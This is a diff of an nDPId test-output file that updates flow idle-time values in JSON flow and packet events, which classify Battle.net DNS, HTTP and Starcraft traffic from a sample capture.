+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAAAoCWgAADUGmrmtwnHgwKgBZAG7DZzPzdbBMZJpS1ARAXR77AAAAAAAAAAA"} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDdAAIAGrOnAqAFkrcJx4A2cAbsxkmlLz83WwlAQAP18YwAA"} +00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABdqvpAADkGo0gC5C5owKgBZAG7DaNR8ZdDlhSqVFAYAi3xwAAAFQMCADAv7rGxhq2HqkFRX8I5oUWALbAWkrPmznIlHUyodNC0DL7UHLBQOucKALsB4ikroko="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaExAAIAGnyvAqAFkAuQuaA2jAbuWFKpUUfGXeFAUAACDRwAA"} 
+00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968525,"pkt":"IImEa8W6hCYVPnXECABFAABd8QVAADkGXTMC5C5ywKgBZAG7DZjX42FMOcd1YVAYArORfwAAFQMCADAnMl10t6P0LqwYwp17IIJpYKwGMbTqEggZBxrTB\/KdrEJjLBHayLFZyNZHXp1TB8c="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968525,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGW1AAIAG7gDAqAFkAuQucg2YAbs5x3Vh1+NhgVAUAADEjQAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968541,"pkt":"IImEa8W6hCYVPnXECABFAABdD8xAADkGPncC5C5owKgBZAG7DaEXdnI2KPa\/clAYAi2WsQAAFQMCADDEyuty98HROVf0C9dCpYEUA7Jug9PX6pMmtPtLY+MIAZP0XBy+LRgi1JBN1q929Nc="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968541,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaE5AAIAGnynAqAFkAuQuaA2hAbso9r9yF3Zya1AUAAA60gAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUtAAPIGObXHJqScwKgBZAG7DZ7bDuslZeBiaVAQFLnPdAAAAAAAAAAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUxAAPIGObTHJqScwKgBZAG7DZ7bDuslZeBiaVARFLnPcwAAAAAAAAAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1437389970671,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389970671,"pkt":"hCYVPnXEIImEa8W6CABFAAA0DEUAAIARlo\/AqAFkrcIoFtFAAbsAIKDYDBnPzxTN69maK3zVmJ1A8q4\/WcfKtlQW"} 
00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1437389976946,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1437389976946,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7AQEICgBN"} 
@@ -128,31 +128,31 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1437389981164,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1437389981164,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2gAAIARVpTAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1437389981169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1437389981169,"pkt":"IImEa8W6hCYVPnXECABFAABOAABAAEARtezAqAH+wKgBZAA1z5kAOuq0W6qBgAABAAEAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAcAMAAEAAQAAAAYABFDvuho="} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1437389982140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982140,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EY9AAIAGHB\/AqAFkUO+6Gg2+AFAFq5RDAAAAAIACIADZ\/QAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1437389982182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982182,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADIGMUXV+H+CwKgBZARfDb3bZ8BEBdN1dWASFtBArgAAAgQFtAAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"} -00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": 
